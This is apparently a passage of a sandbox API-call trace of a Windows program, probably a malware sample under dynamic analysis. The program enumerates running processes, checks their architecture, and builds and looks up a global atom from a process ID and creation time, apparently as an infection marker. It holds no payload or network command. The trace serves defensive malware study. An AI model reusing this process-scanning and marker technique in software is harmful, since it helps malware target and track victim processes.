	[0075.504] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.504] CloseHandle (hObject=0x224) returned 1
	[0075.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0075.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0075.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0075.505] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.505] CloseHandle (hObject=0x224) returned 1
	[0075.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0075.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0075.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0075.505] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.505] CloseHandle (hObject=0x224) returned 1
	[0075.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0075.505] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.505] CloseHandle (hObject=0x224) returned 1
	[0075.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0075.506] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.506] CloseHandle (hObject=0x224) returned 1
	[0075.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0075.506] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.506] CloseHandle (hObject=0x224) returned 1
	[0075.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0075.506] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.506] CloseHandle (hObject=0x224) returned 1
	[0075.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0075.506] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.506] CloseHandle (hObject=0x224) returned 1
	[0075.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0075.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0075.507] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.507] CloseHandle (hObject=0x224) returned 1
	[0075.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0075.507] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.507] CloseHandle (hObject=0x224) returned 1
	[0075.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0075.507] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.507] CloseHandle (hObject=0x224) returned 1
	[0075.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0075.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0075.507] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.507] CloseHandle (hObject=0x224) returned 1
	[0075.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0075.508] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.508] CloseHandle (hObject=0x224) returned 1
	[0075.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0075.508] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.508] CloseHandle (hObject=0x224) returned 1
	[0075.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7289b8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0075.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0075.508] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.508] CloseHandle (hObject=0x224) returned 1
	[0075.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e888, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0075.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0075.508] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.508] CloseHandle (hObject=0x224) returned 1
	[0075.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728858, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0075.508] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.509] CloseHandle (hObject=0x224) returned 1
	[0075.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0075.509] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.509] CloseHandle (hObject=0x224) returned 1
	[0075.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0075.509] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.509] CloseHandle (hObject=0x224) returned 1
	[0075.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728a58, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0075.509] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.509] CloseHandle (hObject=0x224) returned 1
	[0075.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0075.509] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.509] CloseHandle (hObject=0x224) returned 1
	[0075.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0075.510] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.510] CloseHandle (hObject=0x224) returned 1
	[0075.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0075.510] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.510] CloseHandle (hObject=0x224) returned 1
	[0075.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e7e8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0075.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0075.510] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.510] CloseHandle (hObject=0x224) returned 1
	[0075.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0075.510] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.510] CloseHandle (hObject=0x224) returned 1
	[0075.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772170, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0075.510] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.511] CloseHandle (hObject=0x224) returned 1
	[0075.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0075.511] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.511] CloseHandle (hObject=0x224) returned 1
	[0075.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0075.511] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.511] CloseHandle (hObject=0x224) returned 1
	[0075.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7288b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0075.511] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.511] CloseHandle (hObject=0x224) returned 1
	[0075.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e888, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0075.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0075.511] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.511] CloseHandle (hObject=0x224) returned 1
	[0075.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0075.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.512] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.512] CloseHandle (hObject=0x224) returned 1
	[0075.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.512] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.513] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0075.513] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.513] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.514] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetLastError () returned 0x5
	[0075.515] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.515] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0075.515] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.516] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0075.516] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0075.516] CloseHandle (hObject=0x224) returned 1
	[0075.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0075.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0075.516] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.516] CloseHandle (hObject=0x224) returned 1
